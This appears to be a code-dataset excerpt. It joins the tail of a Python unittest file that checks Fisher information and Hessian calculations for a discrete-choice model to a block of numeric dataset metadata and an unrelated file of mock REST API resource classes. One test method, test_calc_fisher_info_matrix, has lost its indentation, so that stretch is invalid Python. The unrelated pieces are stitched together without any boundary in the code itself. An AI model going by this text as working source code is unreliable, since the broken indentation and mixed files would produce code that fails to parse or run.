        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result_weighted.shape)
        npt.assert_allclose(function_result, expected_result_weighted)
        return None
    def test_calc_fisher_info_matrix_no_intercepts(self):
        """
        Ensure that calc_fisher_info_matrix returns the expected values when
        there are no intercept parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        def transform_deriv_intercepts(*args):
            # No intercept parameters in this test
            return None
        fake_deriv = np.exp(self.fake_shapes)[None, :]
        def transform_deriv_shapes(sys_utilities,
                                   alt_IDs,
                                   rows_to_alts,
                                   shape_params):
            return rows_to_alts[:, 1:].multiply(fake_deriv)
        # Collect the arguments needed to calculate the gradients.
        # Positions 1-5 hold row-specific data and are overwritten below;
        # the final two positions are the ridge penalty and the weights.
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         None,
                         self.fake_shapes,
                         None,
                         None]
        # Get the gradient, for each observation, separately.
        # Note this test expects that we only have two observations.
        gradient_args[1] = self.fake_design[:3, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
        gradient_args[3] = self.fake_rows_to_obs[:3, :]
        gradient_args[4] = self.fake_rows_to_alts[:3, :]
        gradient_args[5] = self.choice_array[:3]
        gradient_1 = cc.calc_gradient(*gradient_args)
        gradient_args[1] = self.fake_design[3:, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
        gradient_args[3] = self.fake_rows_to_obs[3:, :]
        gradient_args[4] = self.fake_rows_to_alts[3:, :]
        gradient_args[5] = self.choice_array[3:]
        gradient_2 = cc.calc_gradient(*gradient_args)
        # Calculate the BHHH approximation to the Fisher Info Matrix: the
        # sum, over observations, of each gradient's outer product.
        expected_result = (np.outer(gradient_1, gradient_1) +
                           np.outer(gradient_2, gradient_2))
        # Alias the function being tested
        func = cc.calc_fisher_info_matrix
        # Get the results of the function being tested, on the full dataset
        gradient_args[1] = self.fake_design
        gradient_args[2] = self.fake_df[self.alt_id_col].values
        gradient_args[3] = self.fake_rows_to_obs
        gradient_args[4] = self.fake_rows_to_alts
        gradient_args[5] = self.choice_array
        function_result = func(*gradient_args)
        # Perform the required tests
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        npt.assert_allclose(function_result, expected_result)
        # Test the Fisher info matrix function with weights. Doubling every
        # weight should double the BHHH approximation.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*gradient_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        return None
    def test_calc_fisher_info_matrix_no_shapes(self):
        """
        Ensure that calc_fisher_info_matrix returns the expected values when
        there are no shape parameters.
        """
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        def transform_deriv_intercepts(sys_utilities,
                                       alt_IDs,
                                       rows_to_alts,
                                       shape_params):
            # Exclude the reference alternative's (first) column
            return rows_to_alts[:, 1:]
        def transform_deriv_shapes(*args):
            # No shape parameters in this test
            return None
        # Collect the arguments needed to calculate the gradients.
        # Positions 1-5 hold row-specific data and are overwritten below;
        # the final two positions are the ridge penalty and the weights.
        gradient_args = [self.fake_betas,
                         self.fake_design,
                         self.fake_df[self.alt_id_col].values,
                         self.fake_rows_to_obs,
                         self.fake_rows_to_alts,
                         self.choice_array,
                         self.utility_transform,
                         transform_deriv_shapes,
                         transform_deriv_v,
                         transform_deriv_intercepts,
                         self.fake_intercepts,
                         None,
                         None,
                         None]
        # Get the gradient, for each observation, separately.
        # Note this test expects that we only have two observations.
        gradient_args[1] = self.fake_design[:3, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
        gradient_args[3] = self.fake_rows_to_obs[:3, :]
        gradient_args[4] = self.fake_rows_to_alts[:3, :]
        gradient_args[5] = self.choice_array[:3]
        gradient_1 = cc.calc_gradient(*gradient_args)
        gradient_args[1] = self.fake_design[3:, :]
        gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
        gradient_args[3] = self.fake_rows_to_obs[3:, :]
        gradient_args[4] = self.fake_rows_to_alts[3:, :]
        gradient_args[5] = self.choice_array[3:]
        gradient_2 = cc.calc_gradient(*gradient_args)
        # Calculate the BHHH approximation to the Fisher Info Matrix: the
        # sum, over observations, of each gradient's outer product.
        expected_result = (np.outer(gradient_1, gradient_1) +
                           np.outer(gradient_2, gradient_2))
        # Alias the function being tested
        func = cc.calc_fisher_info_matrix
        # Get the results of the function being tested, on the full dataset
        gradient_args[1] = self.fake_design
        gradient_args[2] = self.fake_df[self.alt_id_col].values
        gradient_args[3] = self.fake_rows_to_obs
        gradient_args[4] = self.fake_rows_to_alts
        gradient_args[5] = self.choice_array
        function_result = func(*gradient_args)
        # Perform the required tests
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        npt.assert_allclose(function_result, expected_result)
        # Test the Fisher info matrix function with weights. Doubling every
        # weight should double the BHHH approximation.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        gradient_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*gradient_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        return None
def test_calc_fisher_info_matrix(self):
"""
Ensure that calc_fisher_info_matrix returns the expected values.
"""
# Designate a function that calculates the parital derivative of the
# transformed index values, with respect to the index.
def transform_deriv_v(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
# Designate functions that calculate the partial derivative of the
# transformed index values, with respect to shape and index parameters
def transform_deriv_intercepts(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:]
fake_deriv = np.exp(self.fake_shapes)[None, :]
def transform_deriv_shapes(sys_utilities,
alt_IDs,
rows_to_alts,
shape_params):
return rows_to_alts[:, 1:].multiply(fake_deriv)
# Collect the arguments needed to calculate the gradients
gradient_args = [self.fake_betas,
self.fake_design,
self.fake_df[self.alt_id_col].values,
self.fake_rows_to_obs,
self.fake_rows_to_alts,
self.choice_array,
self.utility_transform,
transform_deriv_shapes,
transform_deriv_v,
transform_deriv_intercepts,
self.fake_intercepts,
self.fake_shapes,
None,
None]
# Get the gradient, for each observation, separately.
# Note this test expects that we only have two observations.
gradient_args[1] = self.fake_design[:3, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[:3]
gradient_args[3] = self.fake_rows_to_obs[:3, :]
gradient_args[4] = self.fake_rows_to_alts[:3, :]
gradient_args[5] = self.choice_array[:3]
gradient_1 = cc.calc_gradient(*gradient_args)
gradient_args[1] = self.fake_design[3:, :]
gradient_args[2] = self.fake_df[self.alt_id_col].values[3:]
gradient_args[3] = self.fake_rows_to_obs[3:, :]
gradient_args[4] = self.fake_rows_to_alts[3:, :]
gradient_args[5] = self.choice_array[3:]
gradient_2 = cc.calc_gradient(*gradient_args)
# Calcuate the BHHH approximation to the Fisher Info Matrix
expected_result = (np.outer(gradient_1, gradient_1) +
np.outer(gradient_2, gradient_2))
# Alias the function being tested
func = cc.calc_fisher_info_matrix
# Get the results of the function being tested
gradient_args[1] = self.fake_design
gradient_args[2] = self.fake_df[self.alt_id_col].values
gradient_args[3] = self.fake_rows_to_obs
gradient_args[4] = self.fake_rows_to_alts
gradient_args[5] = self.choice_array
function_result = func(*gradient_args)
# Perform the required tests
self.assertIsInstance(function_result, np.ndarray)
self.assertEqual(function_result.shape, expected_result.shape)
npt.assert_allclose(function_result, expected_result)
# Test the Fisher info matrix function with weights
new_weights = 2 * np.ones(self.fake_design.shape[0])
gradient_args[-1] = new_weights
expected_result_weighted = 2 * expected_result
func_result_weighted = func(*gradient_args)
self.assertIsInstance(func_result_weighted, np.ndarray)
self.assertEqual(func_result_weighted.shape,
expected_result_weighted.shape)
npt.assert_allclose(func_result_weighted, expected_result_weighted)
return None
    def test_calc_hessian_no_shapes_no_intercept(self):
        """
        Ensure that the calc_hessian function returns expected results when
        there are no shape parameters and no intercept parameters.
        """
        # Alias the design matrix
        design = self.fake_design
        # Get the matrix block indices for the test
        matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
        # Calculate the probabilities for this test.
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        probs = cc.calc_probabilities(*args, **kwargs)
        # Get the matrix blocks for dP_i_dH_i
        matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
        # Create the dP_dH matrix that represents the derivative of the
        # long probabilities with respect to the array of transformed index
        # values / systematic utilities
        dP_dH = block_diag(matrix_blocks)
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        # (both None since this test has no shape or intercept parameters).
        def transform_deriv_intercepts(*args):
            return None
        def transform_deriv_shapes(*args):
            return None
        # Collect the arguments for the hessian function being tested.
        # The final two positions are the ridge penalty and the weights.
        hessian_args = [self.fake_betas,
                        self.fake_design,
                        self.fake_df[self.alt_id_col].values,
                        self.fake_rows_to_obs,
                        self.fake_rows_to_alts,
                        self.utility_transform,
                        transform_deriv_shapes,
                        transform_deriv_v,
                        transform_deriv_intercepts,
                        matrix_indices,
                        None,
                        None,
                        None,
                        None]
        # Calculate the expected result
        # Since we're essentially dealing with an MNL model in this test,
        # the expected answer is -X^T * dP_dH * X
        expected_result = (-1 * design.T.dot(dP_dH.dot(design)))
        # Alias the function being tested
        func = cc.calc_hessian
        # Get the results of the function being tested
        function_result = func(*hessian_args)
        # Perform the required tests
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        npt.assert_allclose(function_result, expected_result)
        # Test the Hessian function with weights. Doubling every weight
        # should double the hessian.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        hessian_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*hessian_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        # Test the function with the ridge penalty, which subtracts
        # 2 * ridge from the hessian.
        expected_result_weighted -= 2 * self.ridge
        hessian_args[-2] = self.ridge
        function_result = func(*hessian_args)
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result_weighted.shape)
        npt.assert_allclose(function_result, expected_result_weighted)
        return None
    def test_calc_hessian(self):
        """
        Ensure that the calc_hessian function returns expected results when
        there are both shape parameters and intercept parameters.
        """
        # Alias the design matrix
        design = self.fake_design
        # Get the matrix block indices for the test
        matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
        # Calculate the probabilities for this test.
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        probs = cc.calc_probabilities(*args, **kwargs)
        # Get the matrix blocks for dP_i_dH_i
        matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
        # Create the dP_dH matrix that represents the derivative of the
        # long probabilities with respect to the array of transformed index
        # values / systematic utilities
        dP_dH = block_diag(matrix_blocks)
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        def transform_deriv_intercepts(sys_utilities,
                                       alt_IDs,
                                       rows_to_alts,
                                       intercept_params):
            # Exclude the reference alternative's (first) column
            return rows_to_alts[:, 1:]
        fake_deriv = np.exp(self.fake_shapes)[None, :]
        def transform_deriv_shapes(sys_utilities,
                                   alt_IDs,
                                   rows_to_alts,
                                   shape_params):
            return rows_to_alts[:, 1:].multiply(fake_deriv)
        # Collect the arguments for the hessian function being tested.
        # The final two positions are the ridge penalty and the weights.
        hessian_args = [self.fake_betas,
                        self.fake_design,
                        self.fake_df[self.alt_id_col].values,
                        self.fake_rows_to_obs,
                        self.fake_rows_to_alts,
                        self.utility_transform,
                        transform_deriv_shapes,
                        transform_deriv_v,
                        transform_deriv_intercepts,
                        matrix_indices,
                        self.fake_intercepts,
                        self.fake_shapes,
                        None,
                        None]
        # Calculate the derivative of the transformation vector with respect
        # to the shape parameters.
        args = (design.dot(self.fake_betas),
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_alts,
                self.fake_shapes)
        dh_d_shape = transform_deriv_shapes(*args)
        # Calculate the derivative of the transformation vector with respect
        # to the intercept parameters
        dh_d_intercept = self.fake_rows_to_alts[:, 1:]
        # Calculate the various matrices needed for the expected result
        # Note dH_dV is the Identity matrix in this test.
        # See the documentation pdf for a description of what each of these
        # matrixes are. `.A` densifies the sparse derivative matrices.
        # h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
        h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
        # h_32 is -X^T * dH_dV^T * dP_dH * dH_d_intercept
        h_32 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_intercept.A)))
        # h_31 is -X^T * dH_dV^T * dP_dH * dH_d_shape
        h_31 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_shape.A)))
        # h_21 = -dH_d_intercept^T * dP_dH * dH_d_shape
        h_21 = np.asarray(-1 * dh_d_intercept.T.dot(dP_dH.dot(dh_d_shape.A)))
        # h_22 = -dH_d_intercept^T * dP_dH * dH_d_intercept
        h_22 = np.asarray(-1 *
                          dh_d_intercept.T.dot(dP_dH.dot(dh_d_intercept.A)))
        # h_11 = -dH_d_shape^T * dP_dH * dH_d_shape
        h_11 = np.asarray(-1 * dh_d_shape.T.dot(dP_dH.dot(dh_d_shape.A)))
        # Create the final hessian by assembling the symmetric blocks in
        # (shape, intercept, beta) order.
        top_row = np.concatenate((h_11, h_21.T, h_31.T), axis=1)
        middle_row = np.concatenate((h_21, h_22, h_32.T), axis=1)
        bottom_row = np.concatenate((h_31, h_32, h_33), axis=1)
        expected_result = np.concatenate((top_row, middle_row, bottom_row),
                                         axis=0)
        # Alias the function being tested
        func = cc.calc_hessian
        # Get the results of the function being tested
        function_result = func(*hessian_args)
        # Perform the required tests. The result must be a plain ndarray,
        # not a np.matrix subclass.
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        self.assertFalse(isinstance(function_result,
                                    np.matrixlib.defmatrix.matrix))
        npt.assert_allclose(function_result, expected_result)
        # Test the Hessian function with weights. Doubling every weight
        # should double the hessian.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        hessian_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*hessian_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        # Test the function with the ridge penalty, which subtracts
        # 2 * ridge from the hessian.
        expected_result_weighted -= 2 * self.ridge
        hessian_args[-2] = self.ridge
        function_result = func(*hessian_args)
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result_weighted.shape)
        self.assertFalse(isinstance(function_result,
                                    np.matrixlib.defmatrix.matrix))
        npt.assert_allclose(function_result, expected_result_weighted)
        return None
    def test_calc_hessian_no_shapes(self):
        """
        Ensure that the calc_hessian function returns expected results when
        there are no shape parameters.
        """
        # Alias the design matrix
        design = self.fake_design
        # Get the matrix block indices for the test
        matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
        # Calculate the probabilities for this test.
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        probs = cc.calc_probabilities(*args, **kwargs)
        # Get the matrix blocks for dP_i_dH_i
        matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
        # Create the dP_dH matrix that represents the derivative of the
        # long probabilities with respect to the array of transformed index
        # values / systematic utilities
        dP_dH = block_diag(matrix_blocks)
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        def transform_deriv_intercepts(sys_utilities,
                                       alt_IDs,
                                       rows_to_alts,
                                       intercept_params):
            # Exclude the reference alternative's (first) column
            return rows_to_alts[:, 1:]
        def transform_deriv_shapes(sys_utilities,
                                   alt_IDs,
                                   rows_to_alts,
                                   shape_params):
            # No shape parameters in this test
            return None
        # Collect the arguments for the hessian function being tested.
        # The final two positions are the ridge penalty and the weights.
        hessian_args = [self.fake_betas,
                        self.fake_design,
                        self.fake_df[self.alt_id_col].values,
                        self.fake_rows_to_obs,
                        self.fake_rows_to_alts,
                        self.utility_transform,
                        transform_deriv_shapes,
                        transform_deriv_v,
                        transform_deriv_intercepts,
                        matrix_indices,
                        self.fake_intercepts,
                        None,
                        None,
                        None]
        # Calculate the derivative of the transformation vector with respect
        # to the intercept parameters
        dh_d_intercept = self.fake_rows_to_alts[:, 1:]
        # Calculate the various matrices needed for the expected result
        # Note dH_dV is the Identity matrix in this test.
        # See the documentation pdf for a description of what each of these
        # matrixes are. `.A` densifies the sparse derivative matrices.
        # h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
        h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
        # h_32 is -X^T * dH_dV^T * dP_dH * dH_d_intercept
        h_32 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_intercept.A)))
        # h_22 = -dH_d_intercept^T * dP_dH * dH_d_intercept
        h_22 = np.asarray(-1 *
                          dh_d_intercept.T.dot(dP_dH.dot(dh_d_intercept.A)))
        # Create the final hessian by assembling the symmetric blocks in
        # (intercept, beta) order.
        middle_row = np.concatenate((h_22, h_32.T), axis=1)
        bottom_row = np.concatenate((h_32, h_33), axis=1)
        expected_result = np.concatenate((middle_row, bottom_row), axis=0)
        # Alias the function being tested
        func = cc.calc_hessian
        # Get the results of the function being tested
        function_result = func(*hessian_args)
        # Perform the required tests. The result must be a plain ndarray,
        # not a np.matrix subclass.
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        self.assertFalse(isinstance(function_result,
                                    np.matrixlib.defmatrix.matrix))
        npt.assert_allclose(function_result, expected_result)
        # Test the Hessian function with weights. Doubling every weight
        # should double the hessian.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        hessian_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*hessian_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        return None
    def test_calc_hessian_no_intercepts(self):
        """
        Ensure that the calc_hessian function returns expected results when
        there are no intercept parameters.
        """
        # Alias the design matrix
        design = self.fake_design
        # Get the matrix block indices for the test
        matrix_indices = cc.create_matrix_block_indices(self.fake_rows_to_obs)
        # Calculate the probabilities for this test.
        args = [self.fake_betas,
                self.fake_design,
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_obs,
                self.fake_rows_to_alts,
                self.utility_transform]
        kwargs = {"intercept_params": self.fake_intercepts,
                  "shape_params": self.fake_shapes,
                  "return_long_probs": True}
        probs = cc.calc_probabilities(*args, **kwargs)
        # Get the matrix blocks for dP_i_dH_i
        matrix_blocks = cc.create_matrix_blocks(probs, matrix_indices)
        # Create the dP_dH matrix that represents the derivative of the
        # long probabilities with respect to the array of transformed index
        # values / systematic utilities
        dP_dH = block_diag(matrix_blocks)
        # Designate a function that calculates the partial derivative of the
        # transformed index values, with respect to the index.
        def transform_deriv_v(sys_utilities,
                              alt_IDs,
                              rows_to_alts,
                              shape_params):
            # Identity transformation, so the derivative is a sparse identity
            return diags(np.ones(sys_utilities.shape[0]), 0, format='csr')
        # Designate functions that calculate the partial derivative of the
        # transformed index values, with respect to shape and index parameters
        def transform_deriv_intercepts(sys_utilities,
                                       alt_IDs,
                                       rows_to_alts,
                                       intercept_params):
            # No intercept parameters in this test
            return None
        fake_deriv = np.exp(self.fake_shapes)[None, :]
        def transform_deriv_shapes(sys_utilities,
                                   alt_IDs,
                                   rows_to_alts,
                                   shape_params):
            return rows_to_alts[:, 1:].multiply(fake_deriv)
        # Collect the arguments for the hessian function being tested.
        # The final two positions are the ridge penalty and the weights.
        hessian_args = [self.fake_betas,
                        self.fake_design,
                        self.fake_df[self.alt_id_col].values,
                        self.fake_rows_to_obs,
                        self.fake_rows_to_alts,
                        self.utility_transform,
                        transform_deriv_shapes,
                        transform_deriv_v,
                        transform_deriv_intercepts,
                        matrix_indices,
                        None,
                        self.fake_shapes,
                        None,
                        None]
        # Calculate the derivative of the transformation vector with respect
        # to the shape parameters.
        args = (design.dot(self.fake_betas),
                self.fake_df[self.alt_id_col].values,
                self.fake_rows_to_alts,
                self.fake_shapes)
        dh_d_shape = transform_deriv_shapes(*args)
        # Calculate the various matrices needed for the expected result
        # Note dH_dV is the Identity matrix in this test.
        # See the documentation pdf for a description of what each of these
        # matrixes are. `.A` densifies the sparse derivative matrices.
        # h_33 is -X^T * dP_dH * X. This is the hessian in the standard MNL
        h_33 = np.asarray(-1 * design.T.dot(dP_dH.dot(design)))
        # h_31 is -X^T * dH_dV^T * dP_dH * dH_d_shape
        h_31 = np.asarray(-1 * design.T.dot(dP_dH.dot(dh_d_shape.A)))
        # h_11 = -dH_d_shape^T * dP_dH * dH_d_shape
        h_11 = np.asarray(-1 * dh_d_shape.T.dot(dP_dH.dot(dh_d_shape.A)))
        # Create the final hessian by assembling the symmetric blocks in
        # (shape, beta) order.
        top_row = np.concatenate((h_11, h_31.T), axis=1)
        bottom_row = np.concatenate((h_31, h_33), axis=1)
        expected_result = np.concatenate((top_row, bottom_row), axis=0)
        # Alias the function being tested
        func = cc.calc_hessian
        # Get the results of the function being tested
        function_result = func(*hessian_args)
        # Perform the required tests
        self.assertIsInstance(function_result, np.ndarray)
        self.assertEqual(function_result.shape, expected_result.shape)
        npt.assert_allclose(function_result, expected_result)
        # Test the Hessian function with weights. Doubling every weight
        # should double the hessian.
        new_weights = 2 * np.ones(self.fake_design.shape[0])
        hessian_args[-1] = new_weights
        expected_result_weighted = 2 * expected_result
        func_result_weighted = func(*hessian_args)
        self.assertIsInstance(func_result_weighted, np.ndarray)
        self.assertEqual(func_result_weighted.shape,
                         expected_result_weighted.shape)
        npt.assert_allclose(func_result_weighted, expected_result_weighted)
        return None
| 44.34607
| 79
| 0.602422
| 9,551
| 81,242
| 4.859282
| 0.048267
| 0.062054
| 0.027149
| 0.031674
| 0.836073
| 0.807072
| 0.791967
| 0.779427
| 0.76721
| 0.762298
| 0
| 0.010648
| 0.32722
| 81,242
| 1,831
| 80
| 44.370289
| 0.838468
| 0.23782
| 0
| 0.773169
| 0
| 0
| 0.01889
| 0
| 0
| 0
| 0
| 0
| 0.11827
| 1
| 0.055605
| false
| 0
| 0.010591
| 0.033539
| 0.123566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98d3fbf1fd5c3c8b55d719cd5ca105b240724c1f
| 5,274
|
py
|
Python
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 296
|
2020-03-16T19:55:00.000Z
|
2022-01-10T19:46:05.000Z
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 57
|
2020-03-17T11:15:57.000Z
|
2021-07-10T14:42:27.000Z
|
atlas/foundations_core_rest_api_components/src/test/helpers/api_resource_mocks.py
|
DeepLearnI/atlas
|
8aca652d7e647b4e88530b93e265b536de7055ed
|
[
"Apache-2.0"
] | 38
|
2020-03-17T21:06:05.000Z
|
2022-02-08T03:19:34.000Z
|
class APIResourceMocks(object):
    """Namespace of mock resource classes used by the REST API component tests.

    Each mock exposes one HTTP-verb method (index/post/put/delete) that wraps a
    lazily evaluated payload in a ``Response``; the ``Params*`` variants return
    ``self.params`` so a test can inject request parameters.
    """

    def index(self):
        from foundations_core_rest_api_components.lazy_result import LazyResult
        from foundations_core_rest_api_components.response import Response
        return Response('Mock', LazyResult(lambda: 'some data'))

    class Mock(object):
        pass

    class MockWithIndex(object):
        def index(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some data'))

    class MockWithPost(object):
        def post(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some data'))

    class MockWithDelete(object):
        def delete(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some data'))

    class MockWithPut(object):
        def put(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some put data'))

    class ParamsMockWithPutAndStatus(object):
        # Sentinel default; tests overwrite this with the status they expect.
        status_code = -1

        def put(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params),
                            status=self.status_code)

    class MockWithDeleteAndStatus(object):
        def delete(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some data'), status=403)

    class MockWithIndexAndPost(object):
        def index(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some index data'))

        def post(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some post data'))

    class ParamsMockWithIndex(object):
        def index(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params))

    class ParamsMockWithPost(object):
        def post(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params))

    class ParamsMockWithDelete(object):
        def delete(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params))

    class ParamsMockWithIndexAndStatus(object):
        def index(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params), status=403)

    class ParamsMockWithPostAndStatus(object):
        def post(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: self.params), status=403)

    class DifferentMockWithIndex(object):
        def index(self):
            from foundations_core_rest_api_components.lazy_result import LazyResult
            from foundations_core_rest_api_components.response import Response
            return Response('Mock', LazyResult(lambda: 'some different data'))
| 42.192
| 83
| 0.662495
| 543
| 5,274
| 6.127072
| 0.081031
| 0.135257
| 0.171326
| 0.207394
| 0.88428
| 0.872858
| 0.845807
| 0.798317
| 0.798317
| 0.798317
| 0
| 0.002632
| 0.279674
